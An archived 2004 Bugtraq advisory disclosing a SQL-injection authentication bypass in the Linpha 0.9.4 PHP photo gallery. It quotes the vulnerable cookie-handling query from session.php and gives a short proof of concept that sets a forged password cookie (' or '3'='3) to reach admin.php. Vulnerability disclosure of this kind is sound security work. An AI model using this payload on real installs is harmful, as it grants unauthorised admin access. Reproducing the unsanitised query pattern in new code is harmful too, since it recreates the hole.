Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: Linpha 0.9.4: authentication bypass

Linpha 0.9.4: authentication bypass

From: Rubén Molina <ruben_at_udea.edu.co>
Date: Thu, 29 Jul 2004 20:48:12 +0700 (ICT)

/////////////////////////////////////////////////////

//// Vulnerable Program: Linpha
////
//// Url: http://linpha.sf.net
////
//// Version: 0.9.4 Latest version
////
//// Date: Today, July 28 of 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando_at_udea.edu.co

//////////////////////////////////////////////////////

  I. Affected software description:

  LinPHA is easy to use, multilingual, flexible photo/image
archive/album/gallery
  written in PHP.
  It uses a SQL database to store information about your pictures. It
comes with a
  HTML based installer, so you don't need experience in setting up SQL DB

  II. Bug

  There is a bug in the code that allows a possible attacker to bypass the
authentication
  of the linpha admin.
  It can do it without using a password, you only have to modify the
cookies of the
  session, and then browsing the admin.php script

  The bug is located aproximately in [25] of the session.php file:

  1. Sql injection allows to bypass the auth

 // Read Cookie

     24 if(read_config('autologin')) {

     25 if(!isset($_SESSION['user_name']) &&
isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!=""&&
isset($_COOKIE["linpha_password"])&&$_COOKIE["linpha_

        password"]!="")

     26 {

     27 $query_username = $GLOBALS['db']->Execute("SELECT
nickname, level, groups FROM ".PREFIX."users ".

     28 "WHERE ID =
'".$_COOKIE["linpha_userid"]."' AND ".

     29 "password =
'".$_COOKIE["linpha_password"]."'");

     30

     31 if($row = $query_username->FetchRow())

     32 {

     33 $_SESSION["REMOTE_ADDR"] =
@$_SERVER["REMOTE_ADDR"];

     34 $_SESSION["user_name"] = $row[0];

     35 $_SESSION["user_pass"] =
$_COOKIE["linpha_password"];

     36 $_SESSION["user_level"] = $row[1];
     // Store user level

     37 $_SESSION["user_groups"] = $row[2];
     // Store user group membership

     38 }

     39 else // wrong cookie

     40 {

     41 setcookie("linpha_userid"); // delete
cookie linpha_userid

     42 setcookie("linpha_password"); // delete
cookie linpha_password

     43 }

     44 }

     45 }

  There are two cookies that are validated: linpha_userid and
linpha_password.

  So,I would be get in without a password If I inject those cookies .

  I wrote this lines in a test.php:

      1 <?PHP

      2 setcookie("linpha_userid","1",time()+86400*365,'/linpha');

      3 setcookie("linpha_password","' or
'3'='3",time()+86400*365,'/linpha');

      4 ?>

  The script is loaded before the admin.php file, then the new cookies will
  inject the query in [29].

  This is posibble if the magic_quote variable is setting to Off in the
php.ini.

  but anyway, these cookies should be checked before using it in the query.

  ok, That's it!

III. Solution
     ¨¨¨¨¨¨¨¨
    The main coder was contacted and the code was fixed in the cvs ;).

IV. Greetings

    - Greets to GIGAX people, Sandra195 specially
    - Greets All the community. I learn of you!

V. Contact

    Fernando Quintero
    nando_at_udea.edu.co
    Medellín-Colombia

VI. Final words

    !!! Viva Colombia !!!!!!!!
Received on Jul 29 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]